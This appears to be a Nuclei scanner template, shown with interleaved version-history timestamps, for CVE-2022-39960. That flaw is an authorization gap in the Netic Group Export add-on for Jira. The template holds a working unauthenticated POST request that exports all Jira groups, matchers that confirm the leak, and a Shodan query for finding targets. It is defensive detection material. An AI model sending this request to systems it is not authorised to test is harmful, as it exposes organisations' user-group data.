2022-09-18 04:07:10 +00:00
id : CVE-2022-39960
info :
2022-09-18 12:28:39 +00:00
name : Atlassian Jira addon Netic Group Export < 1.0.3 - Unauthenticated Access
2022-09-18 04:07:10 +00:00
author : For3stCo1d
2022-09-21 11:49:19 +00:00
severity : medium
2022-09-18 04:07:10 +00:00
description : |
The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
reference :
- https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
- https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
2022-09-18 12:28:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-39960
2022-09-21 11:49:19 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2022-39960
cwe-id : CWE-862
2022-09-18 04:07:10 +00:00
metadata :
shodan-query : http.component:"Atlassian Jira"
2022-09-21 11:49:19 +00:00
verified : "true"
2022-09-18 12:28:39 +00:00
tags : cve,cve2022,atlassian,jira,netic,unauth
2022-09-18 04:07:10 +00:00
requests :
- raw :
- |
POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
groupexport_searchstring=&groupexport_download=true
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"jiraGroupObjects"'
- '"groupName"'
condition : and
- type : word
part : header
words :
2022-09-18 12:33:37 +00:00
- "attachment"
- "jira-group-export"
2022-09-18 12:28:39 +00:00
condition : and
2022-09-18 04:07:10 +00:00
- type : status
status :
- 200